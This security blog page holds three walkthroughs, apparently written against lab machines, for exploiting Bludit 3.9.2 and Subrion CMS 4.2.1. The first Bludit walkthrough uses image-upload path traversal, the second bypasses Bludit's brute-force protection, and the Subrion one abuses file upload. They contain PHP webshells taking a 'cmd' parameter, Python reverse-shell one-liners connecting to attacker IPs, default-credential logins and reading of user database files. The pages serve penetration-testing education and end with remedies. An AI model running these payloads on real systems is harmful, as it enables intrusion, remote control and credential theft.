by Vry4n_ | Apr 2, 2023 | CMS
Bludit could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper validation of file types. By uploading a specially-crafted image file, an attacker could exploit this vulnerability to execute arbitrary code on the system with privileges of the application.
PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.
Affected Products
Bludit Bludit 3.9.2
Detect
1. Being already authenticated as a log priviledge user, we can check the version of the platform by looking at the site source code page, in our case 3.9.2
2. You can also use curl to get the page source code, then filter by version
- curl http://10.10.10.191/admin
Exploit
1. Knowing this version is vulnerable to CVE-2019-16113, we can try to upload an image, in the main page click on content, or, visit http://10.10.10.191/admin/new-content
2. Click on “Images”, choose the image and upload it
3. Click on “Insert”, and then save the post
3. Now try to locate the place where the image is located, you can search for the publication, right click the image and click on “Open Image”, it will take you to the location of the file, in this case:
- http://10.10.10.191/bl-content/uploads/pages/1b9f41ad138ee8e237ba29b827e1048a/test-image.jpg
4. Now that we know how to locate the file, we can try to upload php code, do the same steps (1-3), but this time upload a file that has code
- vi exploit.php
- <?php echo "Follow us." ?>
Note: we get a warning that only (gif, png, jpg, jpeg, svg) are permitted extensions. So, first we try to change the name of our file, second, we try to upload the file again.
- mv exploit.php exploit.png
5. Now you can try to right click on that empty square, then click on image, to find the location of the file
6. If we try to view this image it will give us an error
- http://10.10.10.191/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png
7. Now using BurpSuite we will try to upload again, and play with the HTTP request
8. We already know the path where the files are saved (/bl-content/uploads/pages/0782f3f4a2ac06cd19d47d03181433a7/exploit.png), so we can exploit the variable named “UUID”, to set the path were the file will be saved, we will send this request to BrupSuite Repeater
- ../../tmp
- (ALTERNATIVE) ../../uploads
Note: this will, create the file and folder if necessary, in the response we need to have “Images Uploaded” with 200 OK Server response code
9. Now locate the file within the specified directory
- http://10.10.10.191/bl-content/tmp/
10. Open the file, and the PHP code should be executed
- http://10.10.10.191/bl-content/tmp/exploit.png
11. Now using the same request in BurpSuite repeater we can modify the code to execute, in this case I will set a system variable to execute code, I will change the filename also to exploi2.png
- <?php echo shell_exec($_GET['cmd']); ?>
12. Check the location again and find the new file
- http://10.10.10.191/bl-content/tmp/
13. Open the file, in the URL use the cmd variable to execute code, we will first try whoami command
- http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=whoami
14. Knowing we can now execute commands we can try to run a reverse shell, first start a listener in the local attacker machine
15. Now use python to execute the reverse shell connection
- http://10.10.10.191/bl-content/tmp/exploit2.png?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
16. Looking at the listener we should have a connection back
Extra
1. Having access to the server we can find users and passwords that can be used to further exploit, move your console to the root directory of the web application, in my case (/var/www/bludit-3.9.2)
- cd /var/www/bludit-3.9.2
- find . -name users.php 2> /dev/null
2. We can read those files and look for user evidence
- cat ./bl-content/databases/users.php
Remedy
See vendor documentation, and upgrade to a recent version.
Resources
https://www.exploit-db.com/exploits/47699
https://www.exploit-db.com/exploits/47699
https://packetstormsecurity.com/files/155295
https://github.com/ynots0ups/CVE-2019-16113
https://github.com/advisories/GHSA-ch69-hjrw-4hf3
https://packetstormsecurity.com/files/155295/Bludit-Directory-Traversal-Image-File-Upload.html
by Vry4n_ | Mar 30, 2023 | CMS
Bludit could allow a remote attacker to bypass security restrictions, caused by a flaw in the bl-kernel/security.class.php. By using many different forged X-Forwarded-For or Client-IP HTTP headers, an attacker could exploit this vulnerability to bypass a brute-force protection mechanism.
Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of the anti-brute force mechanism that is in place to block users that have attempted to incorrectly login 10 times or more. Within the bl-kernel/security.class.php file, there is a function named getUserIp which attempts to determine the true IP address of the end user by trusting the X-Forwarded-For and Client-IP HTTP headers:
The reasoning behind the checking of these headers is to determine the IP address of end users who are accessing the website behind a proxy, however, trusting these headers allows an attacker to easily spoof the source address. Additionally, no validation is carried out to ensure they are valid IP addresses, meaning that an attacker can use any arbitrary value and not risk being locked out.
As can be seen in the content of the log file below (found in bl-content/databases/security.php), submitting a login request with an X-Forwarded-For header value of FakeIp was processed successfully, and the failed login attempt was logged against the spoofed string:
By automating the generation of unique header values, prolonged brute force attacks can be carried out without risk of being blocked after 10 failed attempts, as can be seen in the demonstration video below in which a total of 51 attempts are made prior to recovering the correct password.
Affected versions
Bludit 3.9.2
Detect
1. Access the Bludit main page
2. Check the source code of the log in page, in the HTML header you can find the application version
Exploit (Script 1)
1. This script runs a list of passwords against a single user (you have to know the user.
- git clone https://github.com/pingport80/CVE-2019-17240.git
- cd CVE-2019-17240
2. Run the script enter the username and locate the password file, you can also set the number of threads to use. Once the script finds a match it will stop automatically
- python3 brute.py -u http://10.10.10.191/admin/ -user fergus -w ../wordlist.txt -t 20
Remedy
Update to a version later than 3.9.2 or apply the patch found at https://github.com/bludit/bludit/pull/1090
Resources
https://github.com/bludit/bludit/pull/1090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17240
https://www.exploit-db.com/exploits/48746
https://packetstormsecurity.com/files/158875
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
https://github.com/pingport80/CVE-2019-17240
by Vry4n_ | Jul 9, 2022 | CMS
Subrion CMS could allow a remote authenticated attacker to upload arbitrary files, caused by the improper validation of file extensions by the /panel/uploads URI. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system.
/panel/uploads in Subrion CMS 4.2.1 allows remote attackers to execute arbitrary PHP code via a .pht or .phar file, because the .htaccess file omits these.
Affect version
Identification
1. To identify the version of the Subrion application you can navigate to /panel/
- http://ip/panel/
- http://exfiltrated.offsec/login/
2. You can use curl to get the page info
- curl http://exfiltrated.offsec/panel/ | grep -i Subrion
Exploitation (Script)
1. Now that we know the Subrion CMS version we can proceed search for exploits that apply
- searchsploit Subrion 4.2.1
2. Looking at the results, I would use the “Arbitrary File Upload”, (https://www.exploit-db.com/exploits/49876), so, I download it
- searchsploit -m php/webapps/49876.py
- python 49876.py
3. After successful download, we proceed to test the script, we need to provide the credentials as this is an authenticated attack. You can brute force the credentials or try to use the default ones, admin/admin, in my case the default credentials were set
- python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
- whoami
Exploitation (Manual)
1. Having already the credentials proceed to log into the Subrion CMS console
- http://exfiltrated.offsec/panel/
- admin/admin
2. Once, authenticated, go to http://[address]:[port]/[app_path]/panel/uploads
- http://exfiltrated.offsec/panel/uploads/
3. We will create a php file that prints text as a Proof of Concept, the file extension should be either pht or .phar
- vi php_poc.phar
- cat php_poc.phar
- <?php echo "Vry4n was here!"; ?>
4. Proceed to upload it to Subrion CMS, and check the location, in this case (uploads/php_poc.phar)
5. Navigate to that location, as you can see code has been executed
- http://exfiltrated.offsec/uploads/php_poc.phar
6. Now we can try to upload a basic line of code to proof we can run commands
- vi php_code.phar
- cat php_code.phar
- <?php system($_GET['cmd']); ?>
7. Repeat the upload step, and visit the file, then use the variable cmd followed by the command you need
- http://exfiltrated.offsec/uploads/php_code.phar?cmd=whoami
8. We can run a python reverse shell, start a local listener in our attacking machine
9. I used https://www.revshells.com/ to create a python3 reverse shell
- http://exfiltrated.offsec/uploads/php_code.phar?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.79",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
- whoami
Extra
1. We can try to use a webshell, we will edit the one in our local Kali machine /usr/share/webshells/php/php-reverse-shell.php
- cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/php-reverse-shell.php
- cd ~/Desktop
- mv php-reverse-shell.php php-reverse-shell.phar
- vi php-reverse-shell.phar
2. Start a listener
3. Upload it to the Subrion CMS, and then execute the .phar file, we should have a connection back
- http://exfiltrated.offsec/uploads/php-reverse-shell.phar
- whoami
Remedy
No remedy available as of November 14, 2018.
Resources
https://github.com/intelliants/subrion/issues/801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19422
https://packetstormsecurity.com/files/162591
https://www.exploit-db.com/exploits/49876
https://www.cvedetails.com/cve/CVE-2018-19422/